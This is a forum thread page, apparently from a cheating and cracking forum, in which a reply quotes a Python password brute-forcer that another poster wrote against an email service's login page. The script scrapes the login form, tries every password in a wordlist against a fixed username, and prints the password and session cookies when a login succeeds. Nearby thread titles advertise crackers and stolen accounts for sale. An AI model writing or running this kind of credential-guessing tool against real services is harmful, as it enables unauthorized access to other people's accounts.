Results 1 to 15 of 35

Threaded View

  1. #13
    ASERHaerheadrherherh's Avatar
    Join Date
    Mar 2014
    Gender
    male
    Location
    California
    Posts
    716
    Reputation
    23
    Thanks
    93
    My Mood
    Angelic
    Quote Originally Posted by Nimboso View Post
    I'd go python. Its a super easy language to write a brute forcer in. Here's an example of one I wrote for an email service. No proxy support or captcha bypass though. Just a basic example.

    Code:
        import requests, sys
        from bs4 import BeautifulSoup
    
        ses = requests.Session()
        login = ses.get('https://www.gm*****.uk/#.1730818-header-navlogin2-1')
    
        soup_login = BeautifulSoup(login.content, 'html5lib').find('form').find_all('input')
        loginDict = {}
        for u in soup_login:
            if u.has_attr('value'):
                loginDict[u['name']] = u['value']
        loginDict['username'] = 'hackmereddit@gm*****.uk'
    
        with open('dict.txt', 'r') as dict:
            for word in dict:
                word = word.strip()
                loginDict['password'] = word
                resp = ses.post('https://login.gm*****.uk/login', data=loginDict)
                print(word)
                if '.navigator-bs.gm*****.uk' in resp.cookies.list_domains():
                    print(word)
                    print(resp.cookies)
                    sys.exit()
    But you know, no one really likes python, and coding with some C language or .NET makes you look cooler

  2. The Following User Says Thank You to ASERHaerheadrherherh For This Useful Post:

    BlueCow (01-23-2017)

Similar Threads

  1. [WTS] Minecraft Cracker / Gift Code Methods / MC Accounts / Poison Plugin
    By Sandwich in forum Selling Accounts/Keys/Items
    Replies: 17
    Last Post: 06-07-2014, 03:15 AM
  2. How long till a code cracker comes out XD
    By santasfoot in forum Rust Discussions & Help
    Replies: 0
    Last Post: 01-25-2014, 10:53 PM
  3. [Solved] AQW code crackers...
    By vincelee1998 in forum Adventure Quest Worlds (AQW) Help
    Replies: 1
    Last Post: 12-15-2013, 03:54 AM
  4. [WTS] Selling Brute Force/Cracker Source Code
    By johnstalie in forum Selling Accounts/Keys/Items
    Replies: 3
    Last Post: 07-05-2013, 08:10 PM
  5. Sell pw cracker for runescape for retail code!!!
    By Maartenthebest in forum Trade Accounts/Keys/Items
    Replies: 11
    Last Post: 09-04-2007, 08:34 PM

Tags for this Thread